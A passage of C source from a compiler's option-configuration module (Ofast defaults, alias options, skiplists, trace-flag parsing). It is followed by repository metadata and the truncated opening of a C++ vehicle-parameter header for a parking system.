isa=mips2 */ ); Set_Option_Internal ( og, "mips3" /* duplicates isa=mips3 */ ); Set_Option_Internal ( og, "mips4" /* duplicates isa=mips4 */ ); Set_Option_Internal ( og, "mips5" /* duplicates isa=mips5 */ ); Set_Option_Internal ( og, "mips6" /* duplicates isa=mips6 */ ); og = Get_Command_Line_Group ( Common_Option_Groups, "TENV" ); Set_Option_Internal ( og, "pic1" /* same as -TENV:cpic */ ); Set_Option_Internal ( og, "pic2" /* same as -TENV:pic */ ); #ifdef BACK_END /* -PHASE is just for driver and internal use -- don't expose it */ og = Get_Command_Line_Group ( Common_Option_Groups, "PHASE" ); Set_Option_Internal ( og, NULL ); /* -INLINE and -IPA aren't passed properly to back end, so don't * confuse the poor users by printing the defaults (PV 645705) */ og = Get_Command_Line_Group ( Common_Option_Groups, "INLINE" ); Set_Option_Internal ( og, NULL ); og = Get_Command_Line_Group ( Common_Option_Groups, "IPA" ); Set_Option_Internal ( og, NULL ); #endif /* BACK_END */ } /* ==================================================================== * * Configure_Platform * * Process a platform name, setting Platform and Processor_Name, the * latter to be processed by Configure_Target. The platform name may * come from either -OPT:Ofast=name or -TARG:platform=name. * * ==================================================================== */ static void Configure_Platform ( char *platform_name ) { PLATFORM_OPTIONS *popts; /* If we've already set the platform, and the new name is empty, * don't re-default it: */ if ( Platform != IP0 && ( platform_name == NULL || *platform_name == 0 ) ) { return; } /* Get platform and its associated options: */ popts = Get_Platform_Options ( platform_name ); Platform = POPTS_id(popts); /* Set the per-IP options: */ if ( Processor_Name == NULL ) { Processor_Name = POPTS_pname(popts); } } /* ==================================================================== * * Configure_Ofast * * Configure option defaults which depend on -Ofast (the baseline SPEC * optimizaiton option). These currently include: * * -OPT:Olimit=0 -- no limit on optimization region size. * -OPT:roundoff=3 -- do any mathematically valid rearrangement. * -OPT:div_split=ON -- allow splitting a/b => a*recip(b). * -OPT:speculative_null_ptr_deref=ON -- allow speculation past the null * ptr test. assumes page zero as * readable. * -OPT:alias=typed -- pointers to different types don't alias. * -WOPT:copy_ops=OFF -- don't copy-propagate operations that the IVR * can't handle (OFF by default now, but just in case...). * -WOPT:estr_fb_injury=ON -- SSAPRE strength reduction uses * feedback frequency rather than loop * nesting to decide whether each IV * update should be viewed as injury or * kill. * * This must be done before abi/isa/processor configuration. * * ==================================================================== */ static void Configure_Ofast ( void ) { /* We assume that the driver has defaulted Opt_Level properly. */ /* First set the options that are common to all targets: */ if ( ! Olimit_Set ) { Olimit = 0; Olimit_Set = TRUE; } if ( ! Roundoff_Set ) { Roundoff_Level = ROUNDOFF_ANY; Roundoff_Set = TRUE; } if ( ! Div_Split_Set ) { Div_Split_Allowed = TRUE; Div_Split_Set = TRUE; } /* #645549: There exists an OS bug which gets triggered by NULL ptr speculation. Disable NULL ptr speculation for Ofast (base flags). They will however continue to be turned ON for SPEC peak flags. if ( ! GCM_Eager_Null_Ptr_Deref_Set ) { GCM_Eager_Null_Ptr_Deref = TRUE; GCM_Eager_Null_Ptr_Deref_Set = TRUE; } */ if ( ! Alias_Pointer_Types_Set ) { Alias_Pointer_Types = TRUE; Alias_Pointer_Types_Set = TRUE; } if ( ! WOPT_Enable_Copy_Prop_Bad_Ops_Set ) { WOPT_Enable_Copy_Prop_Bad_Ops = FALSE; WOPT_Enable_Copy_Prop_Bad_Ops_Set = TRUE; } if ( ! WOPT_Enable_Estr_FB_Injury_Set ) { WOPT_Enable_Estr_FB_Injury = TRUE; WOPT_Enable_Estr_FB_Injury_Set = TRUE; } /* Get platform and its associated options: */ Configure_Platform ( Ofast ); } /* ==================================================================== * * Configure * * Configure compiler options based on flag values. * * ==================================================================== */ #ifdef KEEP_WHIRLSTATS /* defined in wn.c */ extern void whirlstats(); #endif extern BOOL IR_set_dump_order (BOOL prefix); /* in ir_reader.c */ void Configure (void) { static BOOL dev_warn_toggled = FALSE; #if !defined(SGI_FRONT_END_CPP) /* See if trees should be dumped in prefix order */ if (Get_Trace(TKIND_INFO, TINFO_PREFIXDUMP)) { IR_set_dump_order(TRUE); } #endif if ( ! dev_warn_toggled ) { if ( Get_Trace( TP_MISC, 0x40 ) ) { dev_warn_toggled = TRUE; DevWarn_Toggle(); } } #ifdef KEEP_WHIRLSTATS atexit(whirlstats); #endif /* Configure the alias options first so the list is processed and * we can tell for -OPT:Ofast below what overrides have occurred: */ Configure_Alias_Options ( Alias_Option ); /* Check the -TARG:platform option (subordinate to Ofast): */ if ( Platform_Name != NULL && *Platform_Name != 0 ) { Configure_Platform ( Platform_Name ); } /* First, if -OPT:Ofast (a.k.a. SPEC) is set, configure defaults: */ if ( Ofast != NULL ) { Configure_Ofast (); } /* Perform host-specific and target-specific configuration: */ Configure_Host (); Configure_Target (); /* What size GOT to use? Configure_Target sets it to small for * 32-bit pointers, large for 64-bit pointers. Override it here * if TENV was used to specify it: */ if ( Use_Large_GOT && Use_Small_GOT ) { /* Make up your mind! */ ErrMsg ( EC_GOT_Size, Guaranteed_Small_GOT ? "small" : "large" ); } else if ( Use_Large_GOT ) { Guaranteed_Small_GOT = FALSE; } else if ( Use_Small_GOT ) { Guaranteed_Small_GOT = TRUE; } if (Emit_Global_Data && Read_Global_Data) { /* Make up your mind! */ FmtAssert (FALSE, ("can't specify options to both emit and read global data")); } else if (Emit_Global_Data) Global_File_Name = Emit_Global_Data; else if (Read_Global_Data) Global_File_Name = Read_Global_Data; /* Configure the treatment of short literals and data. We give * precedence to the -TENV:short_lits=nnn:short_data=mmm options, * but -Gn can override either of them if not specified: */ if ( ! Short_Lits_Set ) { Short_Lits = Max_Sdata_Elt_Size; } if ( ! Short_Data_Set ) { Short_Data = Max_Sdata_Elt_Size; } /* Turn on -OPT:Reorg_Common by default at -O3: */ if ( ! OPT_Reorg_Common_Set && Opt_Level > 2 ) { OPT_Reorg_Common = TRUE; } if (Force_GP_Prolog) Force_Jalr = TRUE; } /* ==================================================================== * * Configure_Source * * Configure compiler options for each source file. * * Note that we set the various optimization and code generation * options at this level to ultimately allow per-source respecification * with pragmas. * * ==================================================================== */ void Configure_Source ( char *filename ) /** NOTE: filename CAN BE NULL */ { /* Identify the source language: */ if ( Language_Name != NULL ) { if ( strcasecmp ( Language_Name, "KR_C" ) == 0 ) { Language = LANG_KR_C; } else if ( strcasecmp ( Language_Name, "ANSI_C" ) == 0 ) { Language = LANG_ANSI_C; } else if ( strcasecmp ( Language_Name, "CPLUS" ) == 0 ) { Language = LANG_CPLUS; } else if ( strcasecmp ( Language_Name, "DELTA" ) == 0 ) { Language = LANG_DELTA; } else if ( strcasecmp ( Language_Name, "F77" ) == 0 ) { Language = LANG_F77; } else if ( strcasecmp ( Language_Name, "F90" ) == 0 ) { Language = LANG_F90; } } /* Configure the -DEBUG and -LIST groups: */ DEBUG_Configure (); LIST_Configure (); /* Determine whether to use the CRAY or MIPS IO library */ if (Library_Name != NULL) { if (strcasecmp ( Library_Name,"cray") == 0 ) { target_io_library = IOLIB_CRAY; } else if (strcasecmp ( Library_Name,"mips") == 0 ) { target_io_library = IOLIB_MIPS; } } else { /* For F90, use the CRAY libraries by default */ if (Language == LANG_F90) { target_io_library = IOLIB_CRAY; /* For F77, use the MIPS libraries by default */ } else { target_io_library = IOLIB_MIPS; } } #ifdef BACK_END /* If we're invoking CITE, turn on whirl2c/f: */ if ( List_Cite ) { if ( Language == LANG_F77 || Language == LANG_F90 ) { Run_w2f = TRUE; } else if ( Language == LANG_KR_C || Language == LANG_ANSI_C || Language == LANG_CPLUS || Language == LANG_DELTA ) { Run_w2c = TRUE; } } /* If we're invoking CITE, turn on whirl2c/f: */ if (Run_w2fc_early) { if ( Language == LANG_F77 || Language == LANG_F90 ) { Run_w2f = TRUE; } else if ( Language == LANG_KR_C || Language == LANG_ANSI_C || Language == LANG_CPLUS || Language == LANG_DELTA ) { Run_w2c = TRUE; } } #endif /* BACK_END */ if ( Use_Large_GOT ) Guaranteed_Small_GOT = FALSE; /* if we get both TENV:CPIC and TENV:PIC, use only TENV:CPIC */ if (Gen_PIC_Call_Shared && Gen_PIC_Shared) Gen_PIC_Shared = FALSE; /* Select optimization options: */ /* Are we skipping any PUs for optimization? */ Optimization_Skip_List = Build_Skiplist ( Opt_Skip ); /* Are we skipping any regions for optimization? */ Region_Skip_List = Build_Skiplist ( Region_Skip ); /* F90 is a recursive language, so this needs to be set */ if (!LANG_Recursive_Set && Language == LANG_F90) LANG_Recursive = TRUE; /* Since there seems to be little compile time reason not to be aggressive, * make the folder aggressive by default */ if ( ! Cfold_Aggr_Set ) Enable_Cfold_Aggressive = TRUE; if(Compile_Upc) // this allows ptr arith operations to be simplified // which causes problems with structs and PTS Enable_Cfold_Aggressive = FALSE; if (!Enable_CVT_Opt_Set) Enable_CVT_Opt = ( Opt_Level > 0); CSE_Elim_Enabled = Opt_Level > 0; /* Perform the %call16 -> %got_disp relocation change? */ if ( ! Enable_GOT_Call_overridden ) Enable_GOT_Call_Conversion = Opt_Level > 2; /* Force formal parameters to memory? */ Force_Mem_Formals = ( Opt_Level < 1 ); /* Optimize for space */ if ( OPT_Space ) { /* TODO: Other space optimizations to force? */ if (!CG_memmove_inst_count_overridden) CG_memmove_inst_count = 8; if (! OPT_unroll_size_overridden) OPT_unroll_size = 20; /* reduce caller+callee "size" limit for inlining */ INLINE_Max_Pu_Size=1000; #if 0 /* not ready for this yet. */ /* don't inline divide expansions */ if (!OPT_Inline_Divide_Set) OPT_Inline_Divide = FALSE; #endif #ifdef BACK_END /* LNO options to be turned off for SPACE */ LNO_Outer_Unroll = 1; LNO_Split_Tiles = FALSE; #endif /* BACK_END */ } /* symbolic debug stuff */ Symbolic_Debug_Mode = SDM_NONE; if (Debug_Level > 0 && Debug_Level <= 2) Symbolic_Debug_Mode |= SDM_SEQLINE; if (Debug_Level > 0) { Symbolic_Debug_Mode |= SDM_SYMBOL; Symbolic_Debug_Mode |= SDM_LINE; } /* Disabling splitting of long basic blocks: */ Enable_BB_Splitting = ! Get_Trace ( TP_FLOWOPT, 0x080 ); if (Opt_Level > 2 && ! Olimit_Set) Olimit = DEFAULT_O3_OLIMIT; if (Olimit == 0) { /* 0 Olimit means no limit or infinite limit */ Olimit = MAX_OLIMIT; } else if (Olimit < 10) { /* olimit too small to work properly */ DevWarn("Olimit < 10 is too small; resetting to Olimit=10"); Olimit = 10; } if (Opt_Level == 0 && ! Olimit_opt_Set) Olimit_opt = FALSE; #if !defined(SGI_FRONT_END_CPP) && !defined(QIKKI_BE) /* -OPT:rail or -OPT:rbi implies -OPT:compile_by_region * unless -OPT:compile_by_region=no is specified. */ if (Regions_Around_Inner_Loops || Region_Boundary_Info) Set_PU_has_region (Get_Current_PU ()); #endif /* !defined(SGI_FRONT_END_CPP) && !defined(QIKKI_BE) */ /* Enable IEEE_arithmetic options */ if (Opt_Level > 2 && !IEEE_Arith_Set) { IEEE_Arithmetic = IEEE_INEXACT; } Recip_Allowed = ARCH_recip_is_exact; /* IEEE arithmetic options: */ if ( IEEE_Arithmetic > IEEE_ACCURATE ) { /* Minor roundoff differences for inexact results: */ if ( ! Recip_Set ) Recip_Allowed = IEEE_Arithmetic >= IEEE_INEXACT; if ( ! Rsqrt_Set ) Rsqrt_Allowed = IEEE_Arithmetic >= IEEE_INEXACT; /* Potential non-IEEE results for exact operations: */ if ( ! Div_Split_Set ) Div_Split_Allowed = IEEE_Arithmetic >= IEEE_ANY; } /* Constant folding options: */ if ( ! Roundoff_Set && Opt_Level > 2 ) { Roundoff_Level = ROUNDOFF_ASSOC; } if ( Roundoff_Level > ROUNDOFF_NONE ) { /* The following allow minor roundoff differences: */ if ( ! Fast_Exp_Set ) Fast_Exp_Allowed = Roundoff_Level >= ROUNDOFF_SIMPLE; /* The following allows folding of intrinsics with constant arguments: */ if ( ! Cfold_Intrinsics_Set ) Enable_Cfold_Intrinsics = Roundoff_Level >= ROUNDOFF_SIMPLE; /* The following allows arbitrary reassociation: */ if ( ! Cfold_Reassoc_Set ) Enable_Cfold_Reassociate = Roundoff_Level >= ROUNDOFF_ASSOC; /* reassociate in the lowerer to find MADD oportunities */ if ( ! Enable_NaryExpr_Set ) Enable_NaryExpr = Roundoff_Level >= ROUNDOFF_ASSOC; if (!Fast_Complex_Set) Fast_Complex_Allowed = Roundoff_Level >= ROUNDOFF_ANY; if (!Fast_NINT_Set) Fast_NINT_Allowed = Roundoff_Level >= ROUNDOFF_ANY; if (!Fast_trunc_Set) Fast_trunc_Allowed = Roundoff_Level >= ROUNDOFF_SIMPLE; if ( ! CIS_Set ) CIS_Allowed |= Roundoff_Level >= ROUNDOFF_SIMPLE; } #if 0 /* Set the relational operator folding in simplifier based on the optimizer setting of Allow_wrap_around_opt */ if (!Simp_Unsafe_Relops_Set && Allow_wrap_around_opt_Set) { Simp_Unsafe_Relops = Allow_wrap_around_opt; } if (!Allow_wrap_around_opt_Set && Simp_Unsafe_Relops_Set ) { Allow_wrap_around_opt = Simp_Unsafe_Relops; } #endif if (!Simp_Unsafe_Relops_Set && Opt_Level > 2) { Simp_Unsafe_Relops = TRUE; } Enable_GDSE = ((Opt_Level > 1) && (!Get_Trace(TP_GLOBOPT, 4096)) ); /* The lowerer will do a simple treeheight reduction for * binary commutative ops */ if (!OPT_Lower_Treeheight_Set) OPT_Lower_Treeheight = (Opt_Level > 1); /* Perform host-specific and target-specific configuration: */ /** NOTE: filename CAN BE NULL */ Configure_Source_Host ( filename ); Configure_Source_Target ( filename ); /* Set eagerness-level-based information. This must come after the * call to Configure_Source_Target, since that routine sets the * FP exception enable masks. */ if ( ! Eager_Level_Set && Opt_Level > 2 ) { Eager_Level = EAGER_ARITH; } if ( Eager_Level >= EAGER_ARITH ) { FP_Exception_Enable_Max &= ~(FPX_I|FPX_U|FPX_O|FPX_V); } if ( Eager_Level >= EAGER_DIVIDE ) { FP_Exception_Enable_Max &= ~FPX_Z; } if ( Eager_Level >= EAGER_MEMORY ) { Force_Memory_Dismiss = TRUE; } #ifdef BACK_END /* Configure the -LNO group: */ LNO_Configure (); #endif /* BACK_END */ /* Trace options: */ if ( Get_Trace ( TP_MISC, 128 ) ) { Trace_Option_Groups ( TFile, Common_Option_Groups, TRUE ); } else if ( Get_Trace ( TP_MISC, 32 ) ) { Trace_Option_Groups ( TFile, Common_Option_Groups, FALSE ); } } /* ==================================================================== * * Configure_Alias_Options * * Configure the options related to alias analysis. * * ==================================================================== */ void Configure_Alias_Options( OPTION_LIST *olist ) { OPTION_LIST *ol; for (ol = olist; ol != NULL; ol = OLIST_next(ol)) { char *val = OLIST_val(ol); INT len = strlen (val); if (strncasecmp( val, "any", len) == 0) { Alias_Pointer_Parms = TRUE; /* observed by Fortran programs */ Alias_Pointer_Cray = FALSE; /* observed by Fortran programs */ Alias_Pointer_Types = TRUE; /* observed by C and C++ programs */ Alias_Not_In_Union = TRUE; /* observed by C++ programs only */ Alias_Pointer_Strongly_Typed = FALSE; /* observed by C and C++ programs */ Alias_Pointer_Types_Set = TRUE; Alias_Not_In_Union_Set = TRUE; /* observed by C++ programs only */ Alias_Pointer_Named_Data = FALSE; /* observed by C and C++ programs */ Alias_Pointer_Restricted = FALSE; /* observed by C and C++ programs */ Alias_Pointer_Disjoint = FALSE; } else if (strncasecmp( val, "parm", len) == 0) { Alias_Pointer_Parms = TRUE; } else if (strncasecmp( val, "typed", len) == 0) { Alias_Pointer_Types = TRUE; Alias_Pointer_Types_Set = TRUE; } else if (strncasecmp( val, "unnamed", len) == 0) { Alias_Pointer_Named_Data = TRUE; } else if (strncasecmp( val, "nounion",len) == 0) { Alias_Not_In_Union = TRUE; /* observed by C++ programs only */ Alias_Not_In_Union_Set = TRUE; /* observed by C++ programs only */ } else if (strncasecmp( val, "restricted", len) == 0) { Alias_Pointer_Restricted = TRUE; Alias_Pointer_Named_Data = TRUE; } else if (strncasecmp( val, "disjoint", len) == 0) { Alias_Pointer_Disjoint = TRUE; Alias_Pointer_Restricted = TRUE; Alias_Pointer_Named_Data = TRUE; } else if (strncasecmp( val, "cray_pointer", len) == 0) { Alias_Pointer_Cray = TRUE; } else if (strncasecmp( val, "strongly_typed", len) == 0) { Alias_Pointer_Strongly_Typed = TRUE; } else if (strncasecmp( val, "no_parm", len) == 0) { Alias_Pointer_Parms = FALSE; } else if (strncasecmp( val, "no_typed", len) == 0) { Alias_Pointer_Types = FALSE; Alias_Pointer_Types_Set = TRUE; } else if (strncasecmp( val, "no_unnamed", len) == 0) { Alias_Pointer_Named_Data = FALSE; } else if (strncasecmp( val, "no_restricted", len) == 0) { Alias_Pointer_Restricted = FALSE; Alias_Pointer_Named_Data = FALSE; } else if (strncasecmp( val, "no_disjoint", len) == 0) { Alias_Pointer_Disjoint = FALSE; Alias_Pointer_Named_Data = FALSE; } else if (strncasecmp( val, "no_cray_pointer", len) == 0) { Alias_Pointer_Cray = FALSE; } else if (strncasecmp( val, "no_strongly_typed", len) == 0) { Alias_Pointer_Strongly_Typed = FALSE; } else if (strncasecmp( val, "cckr_default", len) == 0) { Alias_Pointer_Cckr = TRUE; } else if (strncasecmp( val, "common_scalar", len) == 0) { Alias_Common_Scalar = TRUE; } else if (strncasecmp( val, "no_common_scalar", len) == 0) { Alias_Common_Scalar = FALSE; } else if (strncasecmp( val, "no_f90_pointer_alias", len) == 0) { Alias_F90_Pointer_Unaliased = TRUE; } else if (strncasecmp( val, "f90_pointer_alias", len) == 0) { Alias_F90_Pointer_Unaliased = FALSE; } else { ErrMsg ( EC_Inv_OPT, "alias", val ); } } /* If we didn't explicitly set alias=typed, and this is a -cckr * compilation, turn off Alias_Pointer_Types: */ if ( ! Alias_Pointer_Types_Set && Alias_Pointer_Cckr ) { Alias_Pointer_Types = FALSE; } } /* ==================================================================== * * SKIPLIST * * Support for lists of PU numbers to skip (e.g. for optimization) * based on options in a command line group. A typedef for SKIPLIST * is defined in config.h, but the type is opaque outside; for now, * Build_Skiplist and Query_Skiplist are the only visible interface. * * This interface is sufficiently generic that it could go into flags.* * in common/util. It isn't there because that could end up breaking * the principle that flags.h should not be widely included (i.e. other * than by command line processing). * * ==================================================================== */ typedef enum { SK_NONE, /* End of list */ SK_AFTER, /* Values after this one */ SK_BEFORE, /* Values before this one */ SK_EQUAL /* Just this one */ } SKIPKIND; struct skiplist { mINT32 size; /* Number of elements */ mINT8 *kind; /* Array of kinds */ mINT32 *val; /* Array of values */ }; #define SKIPLIST_size(sl) ((sl)->size) #define SKIPLIST_kind_vec(sl) ((sl)->kind) #define SKIPLIST_kind(sl,i) ((SKIPKIND)((sl)->kind[i])) #define Set_SKIPLIST_kind(sl,i,v) (((sl)->kind[i]) = (mINT8)(v)) #define SKIPLIST_val_vec(sl) ((sl)->val) #define SKIPLIST_val(sl,i) ((sl)->val[i]) /* ==================================================================== * * Print_Skiplist * * Print a skiplist. * * ==================================================================== */ static void Print_Skiplist ( FILE *tf, SKIPLIST *skip, char *lab ) { INT32 i; if ( skip == NULL ) { fprintf ( tf, "SKIPLIST %s empty\n", lab ); return; } fprintf ( tf, "SKIPLIST %s:\n", lab ); for ( i = 0; SKIPLIST_kind(skip,i) != SK_NONE; i++ ) { switch ( SKIPLIST_kind(skip,i) ) { case SK_EQUAL: fprintf ( tf, " equal %d\n", SKIPLIST_val(skip,i) ); break; case SK_AFTER: fprintf ( tf, " after %d\n", SKIPLIST_val(skip,i) ); break; case SK_BEFORE: fprintf ( tf, " before %d\n", SKIPLIST_val(skip,i) ); break; } } fprintf ( tf, "SKIPLIST %s end\n\n", lab ); } /* ==================================================================== * * Build_Skiplist * * Build a skiplist from a group option list. For now, we assume that * the only choices are skip_a* (after) skip_b* (before), and skip_e* * (equal). See Query_Skiplist below for the list semantics. * * Note that we interpret skip_equal=1,3-5,7-10,12,35-39 as you might * hope. * * WARNING: This routine does no error checking. This option is for * internal use, and if the syntax is wrong, strange (non-fatal) things * may happen (typically ignoring the rest of the option). * * ==================================================================== */ SKIPLIST * Build_Skiplist ( OPTION_LIST *olist ) { INT32 count = 0; OPTION_LIST *ol; SKIPLIST *sl; BOOL list_found = FALSE; char *p; /* Count the elements: */ if ( olist == NULL ) return NULL; for ( ol = olist; ol != NULL; ol = OLIST_next(ol) ) { /* At least one entry: */ ++count; /* Check for commas and ranges: */ p = OLIST_val(ol); while ( *p != ':' && *p != 0 ) { if ( *p == ',' || *p == '-' ) { ++count; list_found = TRUE; } ++p; } } /* Allocate the skiplist: */ sl = (SKIPLIST *) malloc ( sizeof(SKIPLIST) ); SKIPLIST_size(sl) = count+1; SKIPLIST_kind_vec(sl) = (mINT8 *) calloc ( sizeof(mINT8), count+1 ); SKIPLIST_val_vec(sl) = (mINT32 *) calloc ( sizeof(mINT32), count+1 ); /* Fill the skiplist: */ for ( count = 0, ol = olist; ol != NULL; ++count, ol = OLIST_next(ol) ) { if ( !strncmp ( "skip_a", OLIST_opt(ol), 6 ) || !strncmp ( "region_skip_a", OLIST_opt(ol), 13 ) ) { Set_SKIPLIST_kind ( sl, count, SK_AFTER ); } else if ( !strncmp ( "skip_b", OLIST_opt(ol), 6 ) || !strncmp ( "region_skip_b", OLIST_opt(ol), 13 ) ) { Set_SKIPLIST_kind ( sl, count, SK_BEFORE ); } else { Set_SKIPLIST_kind ( sl, count, SK_EQUAL ); } SKIPLIST_val(sl,count) = atoi ( OLIST_val(ol) ); /* If this is skip_equal, look for a list... */ if ( list_found && SKIPLIST_kind(sl,count) == SK_EQUAL ) { p = OLIST_val(ol); while ( *p >= '0' && *p <= '9' ) ++p; if ( *p == '-' ) { Set_SKIPLIST_kind ( sl, count, SK_AFTER ); --SKIPLIST_val(sl,count); ++p; ++count; Set_SKIPLIST_kind ( sl, count, SK_BEFORE ); SKIPLIST_val(sl,count) = 1 + atoi ( p ); while ( *p >= '0' && *p <= '9' ) ++p; } while ( *p++ == ',' ) { ++count; Set_SKIPLIST_kind ( sl, count, SK_EQUAL ); SKIPLIST_val(sl,count) = atoi ( p ); while ( *p >= '0' && *p <= '9' ) ++p; if ( *p == '-' ) { Set_SKIPLIST_kind ( sl, count, SK_AFTER ); --SKIPLIST_val(sl,count); ++p; ++count; Set_SKIPLIST_kind ( sl, count, SK_BEFORE ); SKIPLIST_val(sl,count) = 1 + atoi ( p ); while ( *p >= '0' && *p <= '9' ) ++p; } } } } Set_SKIPLIST_kind ( sl, count, SK_NONE ); if ( Get_Trace ( TP_MISC, 0x80 ) ) { Print_Skiplist ( TFile, sl, "Build_Skiplist" ); } return sl; } /* ==================================================================== * * Query_Skiplist * * Query a skiplist. A TRUE result means that the element passed is in * the skiplist. The semantics of the list is as follows: Return TRUE * if elmt is equal to an SK_EQUAL element of the list. Return TRUE if * elmt is greater than an SK_AFTER element AND it is less than an * immediately following SK_BEFORE element; otherwise skip over the * following SK_BEFORE element. Return TRUE if elmt is smaller than an * SK_BEFORE which does not immediately follow an SK_AFTER. If nothing * on the list produces a TRUE result, return FALSE. That is, a list * consists of SK_EQUAL elements, SK_AFTER/SK_BEFORE pairs in that * order, or SK_AFTER and SK_BEFORE elements that aren't in such pairs. * Any match of one of these tests causes a skip. * * ==================================================================== */ BOOL Query_Skiplist ( SKIPLIST *skip, INT32 elmt ) { INT32 i; BOOL ok; if ( skip == NULL ) return FALSE; for ( i = 0; SKIPLIST_kind(skip,i) != SK_NONE; i++ ) { switch ( SKIPLIST_kind(skip,i) ) { case SK_EQUAL: /* printf ( "<skip> equal %d ? %d\n", SKIPLIST_val(skip,i), elmt ); */ if ( SKIPLIST_val(skip,i) == elmt ) return TRUE; break; case SK_AFTER: ok = ( SKIPLIST_val(skip,i) < elmt ); /* printf ( "<skip> after %d ? %d\n", SKIPLIST_val(skip,i), elmt ); */ if ( SKIPLIST_kind(skip,i+1) == SK_BEFORE && SKIPLIST_val(skip,i+1) > SKIPLIST_val(skip,i)) { if ( SKIPLIST_val(skip,++i) <= elmt ) ok = FALSE; } if ( ok ) return TRUE; break; case SK_BEFORE: /* printf ( "<skip> before %d ? %d\n", SKIPLIST_val(skip,i), elmt ); */ if ( SKIPLIST_val(skip,i) > elmt ) return TRUE; break; } } return FALSE; } /* ==================================================================== * * Process_Trace_Option * * Given a trace option -t..., process it. The caller should already * have determined that it cannot be anything else. The option should * be the full option string, with leading -t... (for error messages). * such options may be catenated, except for those which take name * operands which can't be delimited, which must be last. * * ==================================================================== */ BOOL Process_Trace_Option ( char *option ) { char *cp = option+1; INT32 phase; Tracing_Enabled = TRUE; while ( cp && *cp == 't' ) { cp += 2; switch ( *(cp-1) ) { case 'a': Set_Trace (TKIND_ALLOC, Get_Trace_Phase_Number ( &cp, option ) ); break; case 'b': Set_Trace (TKIND_BB, Get_Numeric_Flag (&cp, 0, 32767, 0, option)); break; case 'c': Set_Trace (TKIND_CTRL, Get_Numeric_Flag (&cp, 0, 32767, 0, option)); break; case 'd': Set_Trace (TKIND_DEBUG, Get_Numeric_Flag (&cp, 1, 32767, 0, option)); break; /* ex: -Wb,-tf0 for function 0 in the file */ case 'f': if ( isdigit (*cp) ) { Set_Trace_Pu_Number ( Get_Numeric_Flag (&cp, 0, 0x7fffffff, 0, option) ); } else { Set_Trace_Pu ( cp ); cp = 0; /* Done with this flag */ } break; /* ex: -Wb,-tg1 for region 1 in each function (best when used with -tf) */ case 'g': if ( isdigit (*cp) ) { Set_Trace_Region_Number ( Get_Numeric_Flag (&cp, 0, 0x7fffffff, 0, option) ); } else Is_True(FALSE,("Process_Trace_Option: regions don't have names")); break; case 'i': Set_Trace (TKIND_INFO, Get_Numeric_Flag (&cp, 1, 32767, 0, option)); break; case 'n': Set_Trace (TKIND_TN, Get_Trace_Phase_Number ( &cp, option ) ); break; case 'p': phase = Get_Trace_Phase_Number ( &cp, option ); if ( phase != 0 && (*cp == ',' || *cp == '\0')) Set_Trace (TKIND_XPHASE, phase); break; case 'r': Set_Trace (TKIND_IR, Get_Trace_Phase_Number ( &cp, option ) ); break; case 's': Set_Trace (TKIND_SYMTAB, Get_Trace_Phase_Number ( &cp, option ) ); Symbol_Table_Out = TRUE; break; case 't': phase = Get_Trace_Phase_Number ( &cp, option ); if ( *cp != ',' && *cp != ':' ) { ErrMsg ( EC_Trace_Flag, *cp, option ); break; } cp++; /* skip separator */ Set_Trace (phase, Get_Numeric_Flag (&cp, 1, 0xffffffff, 0, option)); break; #ifdef FRONT_END case 'v': { /* Used by the EDG front ends to control tracing verbosity: */ extern BOOL trace_verbose; /* Type must match a_boolean */ trace_verbose = TRUE; } break; #endif case 0: ErrMsg ( EC_Trace_Flag, '?', option ); return FALSE; default: --cp; ErrMsg ( EC_Trace_Flag, *cp, option ); return FALSE; } } if ( cp && *cp != 0 ) { ErrMsg ( EC_Trace_Flag, '?', option ); return FALSE; } return TRUE; } /* ==================================================================== * * List_Compile_Options * * List options to the given file. This is primarily an interface to * the flags.c routine Print_Option_Groups, but also prints a number of * non-group options. The "internal" flag indicates whether to list * internal-only options. The "full" flag indicates whether to list * all options if "internal" is set; otherwise option group listing * is controlled by List_Options and List_All_Options. * * ==================================================================== */ void List_Compile_Options ( FILE *f, char *pfx, BOOL internal, BOOL full, BOOL update ) { char *bar = SBar+12; /* Shorten it a bit */ fprintf ( f, "\n%s%s%s Compiling %s (%s)\n%s%s", pfx, bar, pfx, Src_File_Name, Irb_File_Name, pfx, bar ); fprintf ( f, "\n%s%s%s Options:\n%s%s", pfx, bar, pfx, pfx, bar ); fprintf ( f, "%s Target:%s, ISA:%s, Pointer Size:%d\n", pfx, Targ_Name (Target), Isa_Name (Target_ISA), (Use_32_Bit_Pointers ? 32 : 64) ); fprintf ( f, "%s -O%d\t(Optimization level)\n", pfx, Opt_Level ); fprintf ( f, "%s -g%d\t(Debug level)\n", pfx, Debug_Level ); if ( Min_Error_Severity == ES_ADVISORY ) fprintf ( f, "%s -m2\t(Report advisories)\n", pfx ); else if ( Min_Error_Severity == ES_WARNING ) fprintf ( f, "%s -m1\t(Report warnings)\n", pfx ); else fprintf ( f, "%s -m0\t(Report errors only)\n", pfx ); fprintf ( f, "%s%s\n", pfx, bar ); if ( internal || List_Options ) { fprintf ( f, "%s Group options are marked with '#' if changed,\n" "%s or with '=' if explicitly set to default value.\n", pfx, pfx ); Print_Option_Groups ( f, Common_Option_Groups, pfx, internal, internal ? full : List_All_Options , update ); } }
f59421bdf0aec176b11c8f71e1314e0ad370b80a
6486e74a34ef45761eae637e7ea0701aa40244b3
/Parking/components/common/vehicle_param_handle/vehicle_param_handle.h
0e20e4b3a9234eb51859f5c3691fcc6bc83dfcb8
[]
no_license
mr-d-self-driving/WorkCode
2d3f85394c704bea33c58704ea64936857bb771e
13e028a217f6f9186b1eda04992cb6c00f941d3d
refs/heads/master
2022-12-13T19:17:58.641963
2020-09-17T12:13:22
2020-09-17T12:13:22
null
0
0
null
null
null
null
UTF-8
C++
false
false
1,774
h
vehicle_param_handle.h
#ifndef COMMON_VEHICLE_PARAM_HANDLE_VEHICLE_PARAM_HANDLE_H_ #define COMMON_VEHICLE_PARAM_HANDLE_VEHICLE_PARAM_HANDLE_H_ #include <string> #include "common/macro.h" #include "common/proto/vehicle_param.pb.h" namespace common { class VehicleParamHandle { public: static void Init(); static void Init(const VehicleParam &param); static void Init(const std::string &param_file); static const VehicleParam& GetParam(); /** * @brief Get the safe turning radius when the vehicle is turning with * maximum steering angle. * * The calculation is described by the following figure. * <pre> * * * front of car * A +----------+ B * | | * / / turn with maximum steering angle * | | * | | * | | * | X | O * |<-->.<----|-------------------------------------->* (turn center) * | | VehicleParam.min_turn_radius() * | | * D +----------+ C * back of car * * </pre> * * In the above figure, The four corner points of the vehicle is A, B, C, and * D. XO is VehicleParam.min_turn_radius(), X to AD is left_edge_to_center, * X to AB is VehicleParam.front_edge_to_center(). Then * AO = sqrt((XO + left_edge_to_center) ^2 + 